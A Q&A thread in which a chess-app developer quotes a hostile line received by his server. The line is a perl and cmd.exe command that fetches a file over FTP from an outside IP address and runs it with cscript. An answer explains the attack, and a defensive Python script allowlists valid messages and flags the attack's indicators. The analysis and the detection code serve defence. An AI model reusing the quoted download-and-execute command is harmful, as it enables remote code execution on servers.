I have a Chess App Online made in Android.
I monitor all messages the server receives after the client has called .accept() and I read the BufferedReader().
I recently got a very strange message from an unknown user, which doesn't match at all with the usual message format that I get.
This was what the server received:
?2 28 \perl.exe -esystem('cmd.exe /c echo bin>f&echo get azb.zip %temp%\\z.zip>>f&echo bye>>f&ftp -A -s:f 112.213.127.52 &cscript.exe /b /e:VBScript.Encode %temp%\\z.zip 579562847 macu://58.238.143.25:88/h')
Does anyone have any idea what this is? And if it is dangerous, what can I do?
Indeed this seems like an attack (or an attempt). If I split the line up, I end up with the following:
The "individual" tries to execute some code on your server. It first creates a file called f with the following content:
bin
get azb.zip %temp%\z.zip
bye
Then it runs the ftp command with that file as input, i.e. it connects to 112.213.127.52 and fetches the file azb.zip and stores it locally (on your server) as %temp%\z.zip
Finally it runs
cscript.exe /b /e:VBScript.Encode %temp%\z.zip 579562847 macu://58.238.143.25:88/h
The whole snippet is wrapped into a perl one-liner. Perl's system() function simply executes the external command given to it, in this case the cmd.exe. I think it's done because it is very unlikely that your server will run cmd.exe but it may run perl because perl is frequently used for server scripts (e.g. cgi scripts).
Good news is: This will work only if all of the following conditions are met:
- perl.exe installed
- cmd.exe installed
- cscript.exe installed
- %temp% correctly
This site says the address 58.238.143.25 is from South Korea and 112.213.127.52 is from Hong Kong.
I wouldn't care. This is an attack for Windows based servers. Is yours?
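As an added example (not code from the question or the answer above), here is a small Python triage script a defender could run over the server's message log: it accepts only lines that match the expected chess message format and, for everything else, tags the indicators the answer dissects (a perl -e one-liner, system()/cmd.exe /c, an ftp -s: scripted download, cscript.exe with VBScript.Encode, and raw IPv4 literals). The expected format "MOVE <from> <to>" / RESIGN / DRAW is an assumption, since the question does not state the real format; the sample lines other than the one quoted in the question are constructed.

```python
import re

# Constructed sample log lines. The first is the line quoted in the question;
# the remaining ones are made-up messages in the ASSUMED chess format.
SAMPLE_LINES = [
    r"?2 28 \perl.exe -esystem('cmd.exe /c echo bin>f&echo get azb.zip %temp%\\z.zip>>f&echo bye>>f&ftp -A -s:f 112.213.127.52 &cscript.exe /b /e:VBScript.Encode %temp%\\z.zip 579562847 macu://58.238.143.25:88/h')",
    "MOVE e2 e4",
    "MOVE g8 f6",
    "RESIGN",
]

# Allowlist of well-formed messages (assumption: the real app's format is not
# given in the question). Anything that does not match is rejected outright,
# so the server never tries to interpret free-form text.
ALLOWED = re.compile(r"^(?:MOVE [a-h][1-8] [a-h][1-8][qrbn]?|RESIGN|DRAW)$")

# Indicators drawn from the attack string the answer takes apart. They are only
# used to label a rejected line for logging; rejection itself comes from the
# allowlist, so an unknown payload is still dropped even if it matches nothing here.
INDICATORS = {
    "perl_oneliner": re.compile(r"perl(?:\.exe)?\s+-e", re.I),
    "shell_exec": re.compile(r"system\(|cmd\.exe\s*/c", re.I),
    "ftp_script_download": re.compile(r"\bftp\b.*-s:", re.I),
    "cscript_encoded_vbs": re.compile(r"cscript\.exe.*VBScript\.Encode", re.I),
    "ipv4_literal": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
}


def classify(line):
    """Return ("ok", []) for an allowed message, else ("reject", [matched indicator names])."""
    if ALLOWED.fullmatch(line.strip()):
        return ("ok", [])
    tags = [name for name, rx in INDICATORS.items() if rx.search(line)]
    return ("reject", tags)


def triage(lines):
    """Classify every line; the message is truncated to 40 chars so hostile input does not flood the log."""
    return [(line[:40], *classify(line)) for line in lines]


if __name__ == "__main__":
    for prefix, verdict, tags in triage(SAMPLE_LINES):
        print(f"{verdict:6s} {tags or '-'}  {prefix!r}")
```

The split between allowlist and indicators is the point: the allowlist is what protects the server (a message that is not a chess move is never acted on), while the indicator tags only make the rejected lines easier to spot in logs and to report.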